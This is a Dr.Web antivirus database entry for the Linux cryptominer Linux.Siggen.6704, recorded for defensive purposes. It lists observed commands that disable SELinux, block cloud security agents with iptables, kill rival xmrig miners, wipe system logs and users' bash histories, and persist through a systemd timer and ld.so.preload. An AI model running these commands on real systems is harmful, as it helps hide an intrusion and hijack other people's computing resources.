Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.6704

Added to the Dr.Web virus database: 2024-03-08

Virus description added:

Technical Information

Malicious functions:
Manages services:
  • ['systemctl', 'start', 'system-kernel.timer']
  • ['systemctl', 'status', 'firewalld']
  • ['systemctl', 'enable', 'system-kernel.timer']
Launches processes:
  • /bin/sh -c setenforce 0
  • /bin/sh /usr/bin/which ufw
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 10.148.188.202 -j DROP
  • grep f2poll
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 10.148.188.201 -j DROP
  • grep -v grep
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.177.125.116 -j DROP
  • /bin/sh -c command -v systemctl
  • ls /usr/local/aegis/aegis_update
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 10.148.188.201 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.149.252.57 -j DROP
  • ps -ef | grep -v grep | grep xmrig | awk \x27{print $2}\x27 | xargs kill -9
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.149.252.62 -j DROP
  • ls /usr/local/qcloud/stargate/admin/uninstall.sh
  • ls /var/lib/qcloud/YunJing/uninst.sh
  • /bin/sh -c ls /usr/local/qcloud/monitor/barad/admin/uninstall.sh || ls /usr/local/qcloud/stargate/admin/uninstall.sh
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 120.232.65.223 -j DROP
  • kill -9
  • ls /usr/local/aegis/aegis_client
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 157.148.45.20 -j DROP
  • /bin/sh -c echo SELINUX=disabled > /etc/sysconfig/selinux
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.149.252.51 -j DROP
  • /tmp/.migo_worker/.migo_worker --config /tmp/.migo_worker/.migo.json
  • /usr/bin/mawk awk {print $2}
  • grep -v ^root$
  • grep xmrig
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 120.232.65.223 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.177.125.116 -j DROP
  • xargs kill -9
  • ls /usr/local/cloudmonitor/cloudmonitorCtl.sh
  • ps -ef | grep -v grep | grep f2poll | awk \x27{print $2}\x27 | xargs kill -9
  • /bin/sh -c ls /usr/local/qcloud/YunJing/uninst.sh || ls /var/lib/qcloud/YunJing/uninst.sh
  • bash -c for user in $(cut -d: -f1 /etc/passwd | grep -v \x27^root$\x27); do -e \x22$(eval echo ~$user)/.bash_history\x22 && > \x22$(eval echo ~$user)/.bash_history\x22; done
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.177.124.86 -j DROP
  • cut -d: -f1 /etc/passwd
  • ls /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 169.254.0.55 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.177.124.86 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.149.252.57 -j DROP
  • bash -c systemctl start system-kernel.timer && systemctl enable system-kernel.timer
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 169.254.0.55 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.149.252.62 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 157.148.45.20 -j DROP
  • bash -c echo -n > /var/log/btmp && echo -n > /var/log/lastlog && echo -n > /var/log/wtmp && echo -n > /var/log/utmp && echo -n > /var/log/secure && echo -n > /var/log/messages
  • /bin/sh -c command -v setenforce
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.149.252.51 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 10.148.188.202 -j DROP
  • ps -ef
  • ls /usr/local/qcloud/YunJing/uninst.sh
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 183.2.143.163 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 183.2.143.163 -j DROP
Performs operations with the file system:
Modifies file access rights:
  • /tmp/.migo
  • /tmp/.migo_worker/.migo_worker
Creates folders:
  • /tmp/.migo_worker
Creates or modifies files:
  • /tmp/.migo_running
  • /etc/security/limits.conf
  • /etc/sysctl.d/mysql.conf
  • /tmp/.migo_worker/.worker.tar.gz
  • /tmp/.migo
  • /etc/systemd/system/system-kernel.service
  • /etc/systemd/system/system-kernel.timer
  • /usr/bin/fakeroot-sysv
  • /etc/sysconfig/selinux
  • /usr/local/lib/libsystemd.so
  • /etc/ld.so.preload
  • /var/log/btmp
  • /var/log/lastlog
  • /var/log/wtmp
  • /var/log/utmp
  • /var/log/secure
  • /var/log/messages
  • /home/user/.bash_history
  • /tmp/.migo_worker/config.json
  • /tmp/.migo_worker/xmrig
  • /tmp/.migo_worker/SHA256SUMS
  • /tmp/.migo_worker/.migo.json
  • /tmp/.migo_worker_running
  • /etc/hosts
  • /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 14#.##.121.3:443
  • 18#.##9.111.133:9
  • 18#.##9.108.133:9
  • 18#.##9.109.133:9
  • 18#.##9.110.133:9
  • 18#.##9.111.133:443
  • 51.##.217.80:65535
  • [2#######0:800:2d50::]:65535
  • 51.##.217.80:9999
DNS ASK:
  • xm##ool.eu
Sends data to the following servers:
  • 8.#.8.8:53
  • 14#.##.121.3:443
  • 18#.##9.111.133:443
  • 51.##.217.80:9999
Receives data from the following servers:
  • 8.#.8.8:53
  • 14#.##.121.3:443
  • 18#.##9.111.133:443
  • 51.##.217.80:9999
Other:
Collects OS information
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number